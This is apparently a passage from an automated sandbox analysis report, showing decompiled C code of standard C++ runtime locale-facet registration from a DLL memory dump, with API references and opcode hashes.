							_t800 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6E1C66BA(_t858 - 0x14);
								return E6E1E0075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6E1D0EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t858 - 0x20);
										E6E1E3D74(_t858 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t606, _t800, _t820, 0x14);
										E6E1C6653(_t858 - 0x14, 0);
										_t821 =  *0x6e286db8;
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6E1A161C(0x6e286d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6E1C66BA(_t858 - 0x14);
											return E6E1E0075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6E1D0F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t858 - 0x20);
													E6E1E3D74(_t858 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t606, _t801, _t821, 0x14);
													E6E1C6653(_t858 - 0x14, 0);
													_t822 =  *0x6e286dec;
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6E1A161C(0x6e286d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6E1C66BA(_t858 - 0x14);
														return E6E1E0075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6E1D0F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t858 - 0x20);
																E6E1E3D74(_t858 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t606, _t802, _t822, 0x14);
																E6E1C6653(_t858 - 0x14, 0);
																_t823 =  *0x6e286dbc;
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6E1A161C(0x6e286d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6E1C66BA(_t858 - 0x14);
																	return E6E1E0075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6E1D0FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t858 - 0x20);
																			E6E1E3D74(_t858 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t606, _t803, _t823, 0x14);
																			E6E1C6653(_t858 - 0x14, 0);
																			_t824 =  *0x6e286df0;
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6E1A161C(0x6e286d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6E1C66BA(_t858 - 0x14);
																				return E6E1E0075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6E1D1057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t858 - 0x20);
																						E6E1E3D74(_t858 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t606, _t804, _t824, 0x14);
																						E6E1C6653(_t858 - 0x14, 0);
																						_t825 =  *0x6e286dc0;
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6E1A161C(0x6e286d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6E1C66BA(_t858 - 0x14);
																							return E6E1E0075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6E1D10BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t858 - 0x20);
																									E6E1E3D74(_t858 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t606, _t805, _t825, 0x14);
																									E6E1C6653(_t858 - 0x14, 0);
																									_t826 =  *0x6e286df8;
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6E1A161C(0x6e286da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6E1C66BA(_t858 - 0x14);
																										return E6E1E0075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6E1D1127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t858 - 0x20);
																												E6E1E3D74(_t858 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t606, _t806, _t826, 0x14);
																												E6E1C6653(_t858 - 0x14, 0);
																												_t827 =  *0x6e286df4;
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6E1A161C(0x6e286da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6E1C66BA(_t858 - 0x14);
																													return E6E1E0075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6E1D11AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t858 - 0x20);
																															E6E1E3D74(_t858 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t606, _t807, _t827, 0x14);
																															E6E1C6653(_t858 - 0x14, 0);
																															_t828 =  *0x6e286dc8;
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6E1A161C(0x6e286d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6E1C66BA(_t858 - 0x14);
																																return E6E1E0075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6E1D1230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t858 - 0x20);
																																		E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t606, _t808, _t828, 0x14);
																																		E6E1C6653(_t858 - 0x14, 0);
																																		_t829 =  *0x6e286dc4;
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6E1A161C(0x6e286d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6E1C66BA(_t858 - 0x14);
																																			return E6E1E0075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6E1D12B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t858 - 0x20);
																																					E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t606, _t809, _t829, 0x14);
																																					E6E1C6653(_t858 - 0x14, 0);
																																					_t830 =  *0x6e286dd8;
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6E1A161C(0x6e286d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6E1C66BA(_t858 - 0x14);
																																						return E6E1E0075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6E1D1339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t858 - 0x20);
																																								E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t606, _t810, _t830, 0x14);
																																								E6E1C6653(_t858 - 0x14, 0);
																																								_t831 =  *0x6e286db0;
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6E1A161C(0x6e286d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6E1C66BA(_t858 - 0x14);
																																									return E6E1E0075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6E1D13A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t858 - 0x20);
																																											E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t606, _t811, _t831, 0x14);
																																											E6E1C6653(_t858 - 0x14, 0);
																																											_t832 =  *0x6e286ddc;
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6E1A161C(0x6e286d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6E1C66BA(_t858 - 0x14);
																																												return E6E1E0075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6E1D1409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t858 - 0x20);
																																														E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t606, _t812, _t832, 0x14);
																																														E6E1C6653(_t858 - 0x14, 0);
																																														_t833 =  *0x6e286de0;
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6E1A161C(0x6e286d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6E1C66BA(_t858 - 0x14);
																																															return E6E1E0075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6E1D1471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t858 - 0x20);
																																																	E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t606, _t813, _t833, 0x14);
																																																	E6E1C6653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6e286dfc;
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6E1A161C(0x6e286da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t858 - 0x14);
																																																		return E6E1E0075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6E1D14EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t858 - 0x20);
																																																				E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t606, _t814, _t834, 0x14);
																																																				E6E1C6653(_t858 - 0x14, 0);
																																																				_t835 =  *0x6e286dcc;
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6E1A161C(0x6e286d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t858 - 0x14);
																																																					return E6E1E0075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6E1D1558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t858 - 0x20);
																																																							E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t606, _t815, _t835, 0x14);
																																																							E6E1C6653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6e286e00;
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6E1A161C(0x6e286dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t858 - 0x14);
																																																								return E6E1E0075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6E1D15C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1A1438(_t858 - 0x20);
																																																										E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e2283cf, _t606, _t816, _t836, 0x14);
																																																										E6E1C6653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6e286dd0;
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6E1A161C(0x6e286d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6E1C66BA(_t858 - 0x14);
																																																											return E6E1E0075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6E1D162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6E1A1438(_t739);
																																																													E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																													asm("int3");
																																																													E6E1E00AC(0x6e22851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6e22c0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6E1D542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6E1E0075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6E1C6FD3(__eflags, _t817);
																																																													 *0x6e22a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6e286dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t816);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6e286e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t815);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6e286dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t814);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6e286dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t813);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6e286de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t812);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6e286ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t811);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6e286db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t810);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6e286dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t809);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6e286dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t808);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6e286dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6E1C6FD3(__eflags, _t807);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6e286df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6E1C6FD3(__eflags, _t806);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6e286df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6E1C6FD3(__eflags, _t805);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6e286dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6E1C6FD3(__eflags, _t804);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6e286df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6E1C6FD3(__eflags, _t803);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6e286dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6E1C6FD3(__eflags, _t802);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6e286dec = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6E1C6FD3(__eflags, _t801);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6e286db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6E1C6FD3(__eflags, _t800);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6e286de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6E1C6FD3(__eflags, _t799);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6e286dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF0EE
int.LIBCPMT ref: 6E1CF105

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

ctype.LIBCPMT ref: 6E1CF128
std::_Facet_Register.LIBCPMT ref: 6E1CF13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF17D

Strings

(k(n, xrefs: 6E1CF0F9

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (k(n
API String ID: 1394824916-4145520377
Opcode ID: dd9a0213930b1594fd282ad2886351a41c6d101ee61b7afc5161df89a4a8cbdb
Instruction ID: 1e8ca8cb7d423c84789e45c6f57448fc64c167cd44a29ab081d33df0703bb644
Opcode Fuzzy Hash: dd9a0213930b1594fd282ad2886351a41c6d101ee61b7afc5161df89a4a8cbdb
Instruction Fuzzy Hash: 75113A759105288BCF01EBE4C854AFEB7BAAF65B14F240409D524E7290DF78D984E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CA0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t178 =  *0x6e286cc8;
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6E1A161C(0x6e286b38);
				_t133 = _a8;
				_t64 = E6E1A171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CA9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t173, _t178, 0x14);
							E6E1C6653( &_v20, 0);
							_t179 =  *0x6e286ccc;
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6E1A161C(0x6e286cb8);
							_t140 = _a8;
							_t174 = E6E1A171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
